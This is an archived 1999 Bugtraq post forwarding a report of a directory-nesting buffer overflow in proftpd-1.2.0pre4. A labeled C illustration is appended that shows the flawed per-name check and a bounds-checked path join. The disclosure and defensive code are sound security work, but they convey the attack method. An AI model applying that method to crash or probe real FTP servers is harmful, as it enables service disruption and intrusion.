4288098 1999-09-08  13:37  /119 lines/ Postmaster
Recipient: Bugtraq (import) <7683>
Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe' (fwd)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@securityfocus.com
X-Sender: jpv@jp-gp.vsi.nl
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-1463810815-1223308169-936489982=:15281"
Content-ID: <Pine.LNX.4.10.9909050208002.15329@prof.fr.nessus.org>
Message-ID:  <Pine.LNX.4.05.9909051345390.8090-200000@jp-gp.vsi.nl>
Date:         Sun, 5 Sep 1999 13:45:56 +0200
Reply-To: Jan-Philip Velders <jpv@JVELDERS.TN.TUDELFT.NL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Jan-Philip Velders <jpv@JVELDERS.TN.TUDELFT.NL>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM


---------- Forwarded message ----------
Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST)
From: Renaud Deraison <deraison@cvs.nessus.org>
To: linux-security@redhat.com
Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4,
     supposed to be 'safe'
Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000
Resent-From: linux-security@redhat.com
Resent-cc: recipient list not shown: ;




Hello,

ProFTPd, an FTP server, has been suffering several security holes lately.

However, the version 1.2.0pre4 is still vulnerable to a mkdir attack,
even though it is supposed to be patched against it.

The trick is to create directories whose names don't exceed 255 chars.

I have not looked at this problem in detail, but I could at least make a
pointer point to a bogus location (85858585) using this method.

Attached to this mail is a C program that will make proftpd crash, but
which won't exploit the vulnerability.


Thank you for your attention,

				-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org
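Illustration added here, not part of Renaud's mail and not proftpd's code: a check that only limits each directory name to 255 chars passes every single name, while a check on the assembled path catches the point at which nested names no longer fit a fixed-size buffer. The buffer size, the join routine and the nesting loop are assumptions for the demo.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Per-name limit the mail refers to (names of 255 chars or fewer pass). */
#define NAME_LIMIT 255
/* Fixed-size buffer for the full path. Assumed size for the demo only. */
#define PATH_BUF_SIZE 1024

/* The insufficient check: it only looks at one directory name. */
bool name_length_ok(const char *name)
{
    return strlen(name) <= NAME_LIMIT;
}

/* Hardened join: writes cwd + "/" + name into out only if the whole result,
 * including the terminating NUL, fits in out_size. snprintf(NULL, 0, ...)
 * reports the length the result would need, so nothing is written past
 * the buffer. Returns false and leaves out untouched when it does not fit. */
bool join_path_checked(const char *cwd, const char *name,
                       char *out, size_t out_size)
{
    int needed = snprintf(NULL, 0, "%s/%s", cwd, name);
    if (needed < 0 || (size_t)needed >= out_size)
        return false;
    snprintf(out, out_size, "%s/%s", cwd, name);
    return true;
}

/* Model a session that creates a directory with a 255-char name, enters it,
 * and repeats. Every name passes name_length_ok, yet the full path grows by
 * 256 chars per level. Returns the nesting depth at which the path no longer
 * fits PATH_BUF_SIZE, i.e. where a server relying on the per-name check
 * alone would write past its buffer. */
int depth_until_path_overflows(void)
{
    char name[NAME_LIMIT + 1];
    memset(name, 'A', NAME_LIMIT);
    name[NAME_LIMIT] = '\0';

    char cwd[PATH_BUF_SIZE] = "";        /* start at the root, joined as "/AAA..." */
    char next[PATH_BUF_SIZE];
    int depth = 0;
    for (;;) {
        if (!name_length_ok(name))
            return -1;                   /* cannot happen: the name is exactly 255 chars */
        if (!join_path_checked(cwd, name, next, sizeof next))
            return depth + 1;            /* this mkdir would not fit the buffer */
        strcpy(cwd, next);               /* safe: the check above ensured it fits */
        depth++;
    }
}
```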


(4288098) -----------------------------------